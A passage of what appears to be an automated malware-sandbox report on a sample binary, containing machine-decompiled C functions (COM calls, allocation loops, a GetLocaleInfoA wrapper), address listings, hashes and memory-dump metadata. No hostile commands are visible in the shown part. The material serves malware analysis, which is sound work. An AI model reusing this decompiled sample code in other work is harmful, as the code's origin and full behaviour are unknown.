				_t418 =  *((intOrPtr*)( *_t241))(_t241, 0x44ad7c, _t432 - 0x3c, _t402, _t416, _t319);
				if(_t418 >= 0) {
					_t419 = __ecx + 0x14;
					__eflags =  *_t419;
					 *(_t432 - 0x2c) = 0;
					if( *_t419 != 0) {
						 *((char*)(__ecx + 0x1c)) = 1;
						goto L13;
					} else {
						 *(_t432 - 0x28) = 0;
						_t311 =  *((intOrPtr*)(_t432 + 8));
						 *(_t432 - 4) = 1;
						_t312 =  *((intOrPtr*)( *_t311))(_t311, 0x44ad5c, _t432 - 0x28);
						 *(_t432 - 0x38) = _t312;
						__eflags = _t312;
						_t313 =  *(_t432 - 0x28);
						if(_t312 >= 0) {
							_t314 =  *((intOrPtr*)( *_t313 + 0xc))(_t313, __ecx + 0xc, _t419, __ecx + 0x18);
							_t419 = _t314;
							__eflags = _t314;
							_t315 =  *(_t432 - 0x28);
							 *(_t432 - 4) = 0;
							if(_t314 >= 0) {
								__eflags = _t315;
								 *((char*)(__ecx + 0x1c)) = 0;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L13:
								 *(_t432 - 0x34) = 0;
								 *(_t432 - 4) = 2;
								 *(_t432 - 0x34) = E00424440(_t320[3] * 0x34);
								 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
								__eflags =  *(_t432 - 0x34);
								if( *(_t432 - 0x34) != 0) {
									 *(_t432 - 4) = 4;
									_t320[4] = E00424440(_t320[3]);
									_t405 = 0;
									__eflags = _t320[4];
									 *(_t432 - 4) = 0;
									if(__eflags != 0) {
										 *(_t432 - 0x30) =  *(_t432 - 0x34);
										 *(_t432 - 0x38) = 0;
										while(1) {
											__eflags = _t405 - _t320[3];
											if(_t405 >= _t320[3]) {
												break;
											}
											 *((char*)(_t405 + _t320[4])) = 0;
											_t410 = _t405 + _t405 * 2 << 4;
											_t272 = _t320[5] + _t410;
											__eflags =  *(_t272 + 0x10) - _t320[9];
											if( *(_t272 + 0x10) <= _t320[9]) {
												L41:
												_t342 =  *((intOrPtr*)(_t272 + 0x14));
												__eflags = _t342 - 0xd;
												if(_t342 != 0xd) {
													__eflags = _t342 - 0x81;
													if(_t342 == 0x81) {
														_t156 = _t272 + 0x10;
														 *_t156 =  *(_t272 + 0x10) + 1;
														__eflags =  *_t156;
													}
													_t274 = _t320[5] + _t410;
													__eflags =  *((short*)(_t274 + 0x14)) - 0x82;
													if( *((short*)(_t274 + 0x14)) == 0x82) {
														 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) +  *((intOrPtr*)(_t274 + 0x10)) + 2;
													}
													_t276 = _t320[5] + _t410;
													__eflags = _t276;
													 *(_t432 - 0x28) = _t276;
													_t278 = E0040B353( *(_t276 + 0x14) & 0x0000ffff);
													_push(0);
													goto L55;
												} else {
													 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
													 *(_t432 - 4) = 8;
													 *(_t432 - 0x44) = E00424440(0x14);
													 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
													__eflags =  *(_t432 - 0x44);
													if( *(_t432 - 0x44) != 0) {
														goto L49;
													} else {
														_t414 =  *(_t432 - 0x38);
														__eflags = _t414;
														if(__eflags > 0) {
															_t427 =  *(_t432 - 0x34) + 0x14;
															__eflags = _t427;
															do {
																_push( *_t427);
																L0042446B(_t320, _t414, _t427, __eflags);
																_t427 = _t427 + 0x34;
																_t414 = _t414 - 1;
																__eflags = _t414;
															} while (__eflags != 0);
														}
														goto L47;
													}
												}
											} else {
												__eflags =  *((short*)(_t272 + 0x14)) - 0xd;
												if( *((short*)(_t272 + 0x14)) == 0xd) {
													goto L41;
												} else {
													_t359 = _t320[8];
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														__eflags = _t359 - 1;
														if(_t359 != 1) {
															__eflags =  *((char*)(_t432 - 0x3d));
															if(__eflags == 0) {
																_t419 = 0;
																 *((intOrPtr*)(_t432 - 0x5c)) = 0x89;
																 *((intOrPtr*)(_t432 - 0x58)) = 0x8b;
																 *(_t432 - 0x50) = 0;
																 *(_t432 - 0x4c) = 0;
																E0040EE56(0, __eflags,  *((intOrPtr*)(_t432 + 8)), _t432 - 0x5c, _t432 - 0x50, 2);
																__eflags =  *(_t432 - 0x50);
																if( *(_t432 - 0x50) == 0) {
																	__eflags =  *(_t432 - 0x4c);
																	if( *(_t432 - 0x4c) != 0) {
																		_t419 = 0x44aec4;
																		goto L32;
																	}
																} else {
																	_t419 = 0x44aed4;
																	L32:
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																}
																 *((char*)(_t432 - 0x3d)) = 1;
															}
															 *(_t432 - 0x44) =  *(_t432 - 0x44) & 0x00000000;
															 *(_t432 - 4) = 6;
															 *(_t432 - 0x44) = E00424440(0x14);
															 *(_t432 - 4) =  *(_t432 - 4) & 0x00000000;
															__eflags =  *(_t432 - 0x44);
															if( *(_t432 - 0x44) != 0) {
																L49:
																 *( *(_t432 - 0x44)) =  *( *(_t432 - 0x44)) & 0x00000000;
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsd");
																_t410 =  *(_t432 - 0x38) +  *(_t432 - 0x38) * 2 << 4;
																 *((short*)(_t320[5] + _t410 + 0x14)) = 0xd;
																 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
																 *(_t432 - 0x28) = _t320[5] + _t410;
																_t278 = E0040B353( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
																_push( *(_t432 - 0x44));
																L55:
																_t169 =  *(_t432 - 0x2c) - 1; // -1
																_t419 = _t278 + _t169 &  !(_t278 - 1);
																_t281 =  *(_t432 - 0x28);
																_t346 =  *((intOrPtr*)(_t281 + 0x10)) + _t419 + 0x00000003 & 0xfffffffc;
																_t390 = _t346 + 0x00000007 & 0xfffffffc;
																_push(_t390);
																_push(_t346);
																_push(_t419);
																_push(0);
																 *(_t432 - 0x2c) = _t390;
																 *(_t432 - 0x2c) =  *(_t432 - 0x2c) + 4;
																 *(_t432 - 0x28) = _t390;
																_push(0);
																_push(0);
																_push( *((intOrPtr*)(_t281 + 0x10)));
																__eflags = 0;
																_push(0);
																_push( *((intOrPtr*)(_t281 + 8)));
																_push( *(_t432 - 0x30));
																E0040B1A2();
																_t435 = _t435 + 0x30;
																goto L56;
															} else {
																_t414 =  *(_t432 - 0x38);
																__eflags = _t414;
																if(__eflags > 0) {
																	_t430 =  *(_t432 - 0x34) + 0x14;
																	__eflags = _t430;
																	do {
																		_push( *_t430);
																		L0042446B(_t320, _t414, _t430, __eflags);
																		_t430 = _t430 + 0x34;
																		_t414 = _t414 - 1;
																		__eflags = _t414;
																	} while (__eflags != 0);
																}
																L47:
																_push( *(_t432 - 0x34));
																L0042446B(_t320, _t414, _t419, __eflags);
																_push(_t320[4]);
																L0042446B(_t320, _t414, _t419, __eflags);
																_t320[4] = _t320[4] & 0x00000000;
																goto L15;
															}
														} else {
															 *(_t272 + 0x15) =  *(_t272 + 0x15) | 0x00000040;
															 *((intOrPtr*)(_t320[5] + _t410 + 0x10)) = 4;
															 *((char*)( *(_t432 - 0x38) + _t320[4])) = 1;
															 *(_t432 - 0x28) = _t320[5] + _t410;
															_t304 = E0040B353( *(_t320[5] + _t410 + 0x14) & 0x0000ffff);
															_t90 =  *(_t432 - 0x2c) - 1; // -1
															_t419 = _t304 + _t90 &  !(_t304 - 1);
															_t392 = ( *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc) + 0x00000007 & 0xfffffffc;
															 *(_t432 - 0x28) = _t392;
															 *(_t432 - 0x2c) = _t392 + 4;
															E0040B282( *(_t432 - 0x30),  *((intOrPtr*)( *(_t432 - 0x28) + 8)), 0,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)), 0, 0, 0, _t419,  *((intOrPtr*)( *(_t432 - 0x28) + 0x10)) + _t419 + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 0);
															_t435 = _t435 + 0x38;
															goto L56;
														}
													} else {
														_t67 = ( *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc) + 7; // 0x8
														_t396 = _t67 & 0xfffffffc;
														 *(_t432 - 0x28) = _t396;
														 *(_t432 - 0x2c) = _t396 + 4;
														_t419 = 0;
														E0040B282( *(_t432 - 0x30),  *((intOrPtr*)(_t272 + 8)), 0,  *(_t272 + 0x10), 0, 0, 0, 0,  *(_t432 - 0x2c) + 0x00000003 & 0xfffffffc,  *(_t432 - 0x28), 0, 0, 1);
														_t435 = _t435 + 0x34;
														L56:
														 *(_t432 - 0x30) =  *(_t432 - 0x30) + 0x34;
														 *(_t432 - 0x38) =  *(_t432 - 0x38) + 1;
														 *(_t320[5] + _t410 + 4) = _t419;
														_t405 =  *(_t432 - 0x38);
														continue;
													}
												}
											}
											goto L85;
										}
										__eflags =  *_t320;
										if( *_t320 != 0) {
											L67:
											_t320[2] = _t320[2] & 0x00000000;
											 *(_t432 - 4) = 0xa;
											_t320[2] = E00424440( *(_t432 - 0x2c));
											_t249 = _t320[2];
											_t405 = 0;
											__eflags = _t249;
											 *(_t432 - 4) = 0;
											if(_t249 != 0) {
												E00412140(_t249, 0,  *(_t432 - 0x2c));
												_t418 = E0040B158( *(_t432 - 0x34), _t320[3],  *_t320,  *(_t432 - 0x2c),  *(_t432 - 0x3c));
												__eflags = _t418;
												if(__eflags < 0) {
													_push(_t320[4]);
													L0042446B(_t320, 0, _t418, __eflags);
													_t320[4] = 0;
												}
												_push( *(_t432 - 0x34));
												L0042446B(_t320, _t405, _t418, __eflags);
												goto L81;
											} else {
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t422 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t422;
													do {
														_push( *_t422);
														L0042446B(_t320, _t405, _t422, __eflags);
														_t405 = _t405 + 1;
														_t422 = _t422 + 0x34;
														__eflags = _t405 - _t320[3];
													} while (__eflags < 0);
													_t405 = 0;
													__eflags = 0;
												}
												_push( *(_t432 - 0x34));
												L0042446B(_t320, _t405, _t419, __eflags);
												_push(_t320[4]);
												L0042446B(_t320, _t405, _t419, __eflags);
												_t320[4] = _t405;
												goto L74;
											}
										} else {
											_push(1);
											_t263 = E0040B0F4(_t320);
											__eflags = _t263;
											 *(_t432 - 0x38) = _t263;
											if(_t263 >= 0) {
												 *((char*)( *_t320 + 4)) = 1;
												goto L67;
											} else {
												_t423 = 0;
												__eflags = _t320[3];
												if(__eflags > 0) {
													_t408 =  *(_t432 - 0x34) + 0x14;
													__eflags = _t408;
													do {
														_push( *_t408);
														L0042446B(_t320, _t408, _t423, __eflags);
														_t423 = _t423 + 1;
														_t408 = _t408 + 0x34;
														__eflags = _t423 - _t320[3];
													} while (__eflags < 0);
												}
												_push( *(_t432 - 0x34));
												L0042446B(_t320, _t405, _t423, __eflags);
												_push(_t320[4]);
												L0042446B(_t320, _t405, _t423, __eflags);
												_t267 =  *(_t432 - 0x3c);
												_t320[4] = _t320[4] & 0x00000000;
												 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
												__eflags = _t267;
												goto L63;
											}
										}
									} else {
										_push( *(_t432 - 0x34));
										L0042446B(_t320, 0, _t419, __eflags);
										L74:
										_t260 =  *(_t432 - 0x3c);
										 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
										__eflags = _t260 - _t405;
										goto L75;
									}
								} else {
									L15:
									_t260 =  *(_t432 - 0x3c);
									 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
									__eflags = _t260;
									L75:
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t260 + 8))(_t260);
									}
									_t254 = 0x8007000e;
								}
							} else {
								__eflags = _t315;
								if(_t315 != 0) {
									 *((intOrPtr*)( *_t315 + 8))(_t315);
								}
								L81:
								_t253 =  *(_t432 - 0x3c);
								 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
								__eflags = _t253 - _t405;
								goto L82;
							}
						} else {
							__eflags = _t313;
							 *(_t432 - 4) = 0;
							if(_t313 != 0) {
								 *((intOrPtr*)( *_t313 + 8))(_t313);
							}
							_t267 =  *(_t432 - 0x3c);
							 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
							__eflags = _t267;
							L63:
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t267 + 8))(_t267);
							}
							_t254 =  *(_t432 - 0x38);
						}
					}
				} else {
					_t253 =  *(_t432 - 0x3c);
					 *(_t432 - 4) =  *(_t432 - 4) | 0xffffffff;
					_t439 = _t253;
					L82:
					if(_t439 != 0) {
						 *((intOrPtr*)( *_t253 + 8))(_t253);
					}
					_t254 = _t418;
				}
				L85:
				 *[fs:0x0] =  *((intOrPtr*)(_t432 - 0xc));
				return E00412FBB(_t254,  *((intOrPtr*)(_t432 - 0x14)));
			}
















































                                                                              0x0040ef33
                                                                              0x0040ef38
                                                                              0x0040ef3b
                                                                              0x0040ef40
                                                                              0x0040ef4f
                                                                              0x0040ef50
                                                                              0x0040ef51
                                                                              0x0040ef52
                                                                              0x0040ef54
                                                                              0x0040ef57
                                                                              0x0040ef5a
                                                                              0x0040ef5d
                                                                              0x0040ef5e
                                                                              0x0040ef62
                                                                              0x0040ef67
                                                                              0x0040ef77
                                                                              0x0040ef7b
                                                                              0x0040ef8d
                                                                              0x0040ef90
                                                                              0x0040ef92
                                                                              0x0040ef95
                                                                              0x0040f014
                                                                              0x00000000
                                                                              0x0040ef97
                                                                              0x0040ef97
                                                                              0x0040ef9a
                                                                              0x0040efa9
                                                                              0x0040efad
                                                                              0x0040efaf
                                                                              0x0040efb2
                                                                              0x0040efb4
                                                                              0x0040efb7
                                                                              0x0040efe1
                                                                              0x0040efe4
                                                                              0x0040efe6
                                                                              0x0040efe8
                                                                              0x0040efeb
                                                                              0x0040efef
                                                                              0x0040f004
                                                                              0x0040f006
                                                                              0x0040f00a
                                                                              0x0040f00f
                                                                              0x0040f00f
                                                                              0x0040f018
                                                                              0x0040f01f
                                                                              0x0040f022
                                                                              0x0040f02c
                                                                              0x0040f042
                                                                              0x0040f046
                                                                              0x0040f04a
                                                                              0x0040f05d
                                                                              0x0040f067
                                                                              0x0040f07d
                                                                              0x0040f07f
                                                                              0x0040f082
                                                                              0x0040f085
                                                                              0x0040f097
                                                                              0x0040f09a
                                                                              0x0040f09d
                                                                              0x0040f09d
                                                                              0x0040f0a0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040f0a9
                                                                              0x0040f0b3
                                                                              0x0040f0b6
                                                                              0x0040f0bb
                                                                              0x0040f0be
                                                                              0x0040f259
                                                                              0x0040f259
                                                                              0x0040f25d
                                                                              0x0040f261
                                                                              0x0040f314
                                                                              0x0040f319
                                                                              0x0040f31b
                                                                              0x0040f31b
                                                                              0x0040f31b
                                                                              0x0040f31b
                                                                              0x0040f321
                                                                              0x0040f323
                                                                              0x0040f329
                                                                              0x0040f332
                                                                              0x0040f332
                                                                              0x0040f338
                                                                              0x0040f338
                                                                              0x0040f33a
                                                                              0x0040f342
                                                                              0x0040f347
                                                                              0x00000000
                                                                              0x0040f267
                                                                              0x0040f267
                                                                              0x0040f26d
                                                                              0x0040f277
                                                                              0x0040f28d
                                                                              0x0040f291
                                                                              0x0040f295
                                                                              0x00000000
                                                                              0x0040f297
                                                                              0x0040f297
                                                                              0x0040f29a
                                                                              0x0040f29c
                                                                              0x0040f2a1
                                                                              0x0040f2a1
                                                                              0x0040f2a4
                                                                              0x0040f2a4
                                                                              0x0040f2a6
                                                                              0x0040f2ab
                                                                              0x0040f2ae
                                                                              0x0040f2ae
                                                                              0x0040f2af
                                                                              0x0040f2a4
                                                                              0x00000000
                                                                              0x0040f29c
                                                                              0x0040f295
                                                                              0x0040f0c4
                                                                              0x0040f0c4
                                                                              0x0040f0c9
                                                                              0x00000000
                                                                              0x0040f0cf
                                                                              0x0040f0cf
                                                                              0x0040f0d2
                                                                              0x0040f0d5
                                                                              0x0040f126
                                                                              0x0040f129
                                                                              0x0040f1b6
                                                                              0x0040f1ba
                                                                              0x0040f1c9
                                                                              0x0040f1cd
                                                                              0x0040f1d4
                                                                              0x0040f1db
                                                                              0x0040f1de
                                                                              0x0040f1e1
                                                                              0x0040f1e6
                                                                              0x0040f1e9
                                                                              0x0040f1f2
                                                                              0x0040f1f5
                                                                              0x0040f1f7
                                                                              0x00000000
                                                                              0x0040f1f7
                                                                              0x0040f1eb
                                                                              0x0040f1eb
                                                                              0x0040f1fc
                                                                              0x0040f1ff
                                                                              0x0040f200
                                                                              0x0040f201
                                                                              0x0040f202
                                                                              0x0040f202
                                                                              0x0040f203
                                                                              0x0040f203
                                                                              0x0040f207
                                                                              0x0040f20d
                                                                              0x0040f217
                                                                              0x0040f22d
                                                                              0x0040f231
                                                                              0x0040f235
                                                                              0x0040f2d2
                                                                              0x0040f2d5
                                                                              0x0040f2db
                                                                              0x0040f2dc
                                                                              0x0040f2dd
                                                                              0x0040f2de
                                                                              0x0040f2e8
                                                                              0x0040f2eb
                                                                              0x0040f2f5
                                                                              0x0040f302
                                                                              0x0040f30a
                                                                              0x0040f30f
                                                                              0x0040f349
                                                                              0x0040f34c
                                                                              0x0040f353
                                                                              0x0040f355
                                                                              0x0040f35f
                                                                              0x0040f365
                                                                              0x0040f368
                                                                              0x0040f369
                                                                              0x0040f36f
                                                                              0x0040f370
                                                                              0x0040f372
                                                                              0x0040f375
                                                                              0x0040f379
                                                                              0x0040f37c
                                                                              0x0040f382
                                                                              0x0040f383
                                                                              0x0040f386
                                                                              0x0040f38c
                                                                              0x0040f38d
                                                                              0x0040f390
                                                                              0x0040f393
                                                                              0x0040f398
                                                                              0x00000000
                                                                              0x0040f237
                                                                              0x0040f237
                                                                              0x0040f23a
                                                                              0x0040f23c
                                                                              0x0040f241
                                                                              0x0040f241
                                                                              0x0040f244
                                                                              0x0040f244
                                                                              0x0040f246
                                                                              0x0040f24b
                                                                              0x0040f24e
                                                                              0x0040f24e
                                                                              0x0040f24f
                                                                              0x0040f252
                                                                              0x0040f2b2
                                                                              0x0040f2b2
                                                                              0x0040f2b5
                                                                              0x0040f2ba
                                                                              0x0040f2bd
                                                                              0x0040f2c2
                                                                              0x00000000
                                                                              0x0040f2c7
                                                                              0x0040f12f
                                                                              0x0040f12f
                                                                              0x0040f139
                                                                              0x0040f144
                                                                              0x0040f14d
                                                                              0x0040f155
                                                                              0x0040f15d
                                                                              0x0040f164
                                                                              0x0040f176
                                                                              0x0040f179
                                                                              0x0040f17f
                                                                              0x0040f1a9
                                                                              0x0040f1ae
                                                                              0x00000000
                                                                              0x0040f1ae
                                                                              0x0040f0d7
                                                                              0x0040f0e0
                                                                              0x0040f0e5
                                                                              0x0040f0e8
                                                                              0x0040f0ee
                                                                              0x0040f0f8
                                                                              0x0040f119
                                                                              0x0040f11e
                                                                              0x0040f39b
                                                                              0x0040f39b
                                                                              0x0040f3a2
                                                                              0x0040f3a5
                                                                              0x0040f3a9
                                                                              0x00000000
                                                                              0x0040f3a9
                                                                              0x0040f0d5
                                                                              0x0040f0c9
                                                                              0x00000000
                                                                              0x0040f0be
                                                                              0x0040f3b1
                                                                              0x0040f3b4
                                                                              0x0040f419
                                                                              0x0040f41c
                                                                              0x0040f420
                                                                              0x0040f42a
                                                                              0x0040f440
                                                                              0x0040f443
                                                                              0x0040f445
                                                                              0x0040f447
                                                                              0x0040f44a
                                                                              0x0040f49c
                                                                              0x0040f4b4
                                                                              0x0040f4b9
                                                                              0x0040f4bb
                                                                              0x0040f4bd
                                                                              0x0040f4c0
                                                                              0x0040f4c6
                                                                              0x0040f4c6
                                                                              0x0040f4c9
                                                                              0x0040f4cc
                                                                              0x00000000
                                                                              0x0040f44c
                                                                              0x0040f44c
                                                                              0x0040f44f
                                                                              0x0040f454
                                                                              0x0040f454
                                                                              0x0040f457
                                                                              0x0040f457
                                                                              0x0040f459
                                                                              0x0040f45e
                                                                              0x0040f45f
                                                                              0x0040f462
                                                                              0x0040f465
                                                                              0x0040f468
                                                                              0x0040f468
                                                                              0x0040f468
                                                                              0x0040f46a
                                                                              0x0040f46d
                                                                              0x0040f472
                                                                              0x0040f475
                                                                              0x0040f47b
                                                                              0x00000000
                                                                              0x0040f47b
                                                                              0x0040f3b6
                                                                              0x0040f3b6
                                                                              0x0040f3ba
                                                                              0x0040f3bf
                                                                              0x0040f3c1
                                                                              0x0040f3c4
                                                                              0x0040f415
                                                                              0x00000000
                                                                              0x0040f3c6
                                                                              0x0040f3c6
                                                                              0x0040f3c8
                                                                              0x0040f3cb
                                                                              0x0040f3d0
                                                                              0x0040f3d0
                                                                              0x0040f3d3
                                                                              0x0040f3d3
                                                                              0x0040f3d5
                                                                              0x0040f3da
                                                                              0x0040f3db
                                                                              0x0040f3de
                                                                              0x0040f3e1
                                                                              0x0040f3d3
                                                                              0x0040f3e4
                                                                              0x0040f3e7
                                                                              0x0040f3ec
                                                                              0x0040f3ef
                                                                              0x0040f3f4
                                                                              0x0040f3f7
                                                                              0x0040f3fb
                                                                              0x0040f401
                                                                              0x00000000
                                                                              0x0040f401
                                                                              0x0040f3c4
                                                                              0x0040f087
                                                                              0x0040f087
                                                                              0x0040f08a
                                                                              0x0040f47e
                                                                              0x0040f47e
                                                                              0x0040f481
                                                                              0x0040f486
                                                                              0x00000000
                                                                              0x0040f486
                                                                              0x0040f04c
                                                                              0x0040f04c
                                                                              0x0040f04c
                                                                              0x0040f04f
                                                                              0x0040f053
                                                                              0x0040f488
                                                                              0x0040f488
                                                                              0x0040f48d
                                                                              0x0040f48d
                                                                              0x0040f490
                                                                              0x0040f490
                                                                              0x0040eff1
                                                                              0x0040eff1
                                                                              0x0040eff3
                                                                              0x0040effc
                                                                              0x0040effc
                                                                              0x0040f4d2
                                                                              0x0040f4d2
                                                                              0x0040f4d5
                                                                              0x0040f4d9
                                                                              0x00000000
                                                                              0x0040f4d9
                                                                              0x0040efb9
                                                                              0x0040efb9
                                                                              0x0040efbb
                                                                              0x0040efbf
                                                                              0x0040efc4
                                                                              0x0040efc4
                                                                              0x0040efc7
                                                                              0x0040efca
                                                                              0x0040efce
                                                                              0x0040f403
                                                                              0x0040f403
                                                                              0x0040f408
                                                                              0x0040f408
                                                                              0x0040f40b
                                                                              0x0040f40b
                                                                              0x0040efb7
                                                                              0x0040ef7d
                                                                              0x0040ef7d
                                                                              0x0040ef80
                                                                              0x0040ef84
                                                                              0x0040f4db
                                                                              0x0040f4db
                                                                              0x0040f4e0
                                                                              0x0040f4e0
                                                                              0x0040f4e3
                                                                              0x0040f4e3
                                                                              0x0040f4e5
                                                                              0x0040f4e8
                                                                              0x0040f4fb

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID: 4
                                                                              • API String ID: 3519838083-4088798008
                                                                              • Opcode ID: a00ed857bb0abb5ce746a0d139e256f0dd494d3f6ef89f4918d8f2e512ffb815
                                                                              • Instruction ID: 1a3d5865c41b8acd5c9ea14f92161a1368557ac6931b133174c3137511837e4c
                                                                              • Opcode Fuzzy Hash: a00ed857bb0abb5ce746a0d139e256f0dd494d3f6ef89f4918d8f2e512ffb815
                                                                              • Instruction Fuzzy Hash: AD12B071900214EFCF15DFA4D840BAEBBB1EF84324F2481BAE815BB292C779D945CB59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041BEA7, Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 97%
                                                                              			E0041BEA7(void* __edx, int _a4, int _a8, char* _a12, int _a16) {
				signed int _t19;
				intOrPtr _t21;
				int _t32;
				void* _t37;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t47;
				void* _t48;
				void* _t49;
				char* _t50;
				void* _t54;

				_t47 = __edx;
				_t49 = 0;
				_t48 = 0x1a;
				while(1) {
					_t32 = _a16;
					asm("cdq");
					_t19 = _t48 + _t49 - _t47 >> 1;
					_t54 = _a4 -  *((intOrPtr*)(0x44cdb0 + _t19 * 0x2c));
					if(_t54 == 0) {
						break;
					}
					if(_t54 >= 0) {
						_t49 = _t19 + 1;
					} else {
						_t48 = _t19 - 1;
					}
					if(_t49 <= _t48) {
						continue;
					} else {
						L6:
						return GetLocaleInfoA(_a4, _a8, _a12, _t32);
					}
				}
				_t37 = _a8 - 1;
				if(_t37 == 0) {
					_t21 = 0x44cdb4 + _t19 * 0x2c;
					L22:
					if(_t21 == 0 || _t32 < 1) {
						goto L6;
					} else {
						_t50 = _a12;
						E0041ADB0(_t50, _t21, _t32 - 1);
						_t50[_t32 - 1] = 0;
						return 1;
					}
				}
				_t40 = _t37;
				if(_t40 == 0) {
					_t21 = 0x44cdc0 + _t19 * 0x2c;
					goto L22;
				}
				_t41 = _t40 - 4;
				if(_t41 == 0) {
					_t21 = 0x44cdc8 + _t19 * 0x2c;
					goto L22;
				}
				_t42 = _t41 - 4;
				if(_t42 == 0) {
					_t21 = 0x44cdcc + _t19 * 0x2c;
					goto L22;
				}
				_t43 = _t42 - 0xff6;
				if(_t43 == 0) {
					_t21 =  *((intOrPtr*)(0x44cdbc + _t19 * 0x2c));
					goto L22;
				}
				_t44 = _t43 - 1;
				if(_t44 == 0) {
					_t21 =  *((intOrPtr*)(0x44cdc4 + _t19 * 0x2c));
					goto L22;
				}
				if(_t44 != 0) {
					goto L6;
				}
				_t21 = 0x44cdd4 + _t19 * 0x2c;
				goto L22;
			}

















                                                                              0x0041bea7
                                                                              0x0041beaf
                                                                              0x0041beb1
                                                                              0x0041beb2
                                                                              0x0041beb2
                                                                              0x0041beb8
                                                                              0x0041bebb
                                                                              0x0041bec8
                                                                              0x0041becb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041becd
                                                                              0x0041bed4
                                                                              0x0041becf
                                                                              0x0041becf
                                                                              0x0041becf
                                                                              0x0041bed9
                                                                              0x00000000
                                                                              0x0041bedb
                                                                              0x0041bedb
                                                                              0x00000000
                                                                              0x0041bee5
                                                                              0x0041bed9
                                                                              0x0041bef5
                                                                              0x0041bef6
                                                                              0x0041bf56
                                                                              0x0041bf5b
                                                                              0x0041bf5d
                                                                              0x00000000
                                                                              0x0041bf6c
                                                                              0x0041bf6c
                                                                              0x0041bf75
                                                                              0x0041bf7f
                                                                              0x00000000
                                                                              0x0041bf84
                                                                              0x0041bf5d
                                                                              0x0041bef9
                                                                              0x0041befa
                                                                              0x0041bf4c
                                                                              0x00000000
                                                                              0x0041bf4c
                                                                              0x0041befc
                                                                              0x0041beff
                                                                              0x0041bf42
                                                                              0x00000000
                                                                              0x0041bf42
                                                                              0x0041bf01
                                                                              0x0041bf04
                                                                              0x0041bf38
                                                                              0x00000000
                                                                              0x0041bf38
                                                                              0x0041bf06
                                                                              0x0041bf0c
                                                                              0x0041bf2d
                                                                              0x00000000
                                                                              0x0041bf2d
                                                                              0x0041bf0e
                                                                              0x0041bf0f
                                                                              0x0041bf22
                                                                              0x00000000
                                                                              0x0041bf22
                                                                              0x0041bf13
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041bf18
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale_strncpy
                                                                              • String ID:
                                                                              • API String ID: 4025304676-0
                                                                              • Opcode ID: ef6e96104dd73f4c2bb4192b53f02e908a709e40200f1d84635109f120fd7e0c
                                                                              • Instruction ID: d34e9a2a43db00d120738a4eb6c5a812920ccc45ea95dbd39662a585c017a8e6
                                                                              • Opcode Fuzzy Hash: ef6e96104dd73f4c2bb4192b53f02e908a709e40200f1d84635109f120fd7e0c
                                                                              • Instruction Fuzzy Hash: 3921D6726051069ADB1CCE38CD899F67B58EB54300708803BE606CA2A2E779DDC79ADD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041EF9C, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 18%
                                                                              			E0041EF9C(void* __ecx, void* __eflags) {
				void* _t24;

				E00412ABE(__ecx, __eflags);
				 *(_t24 - 4) =  *(_t24 - 4) | 0xffffffff;
				__eflags = 0;
				if(0 != 0) {
					L5:
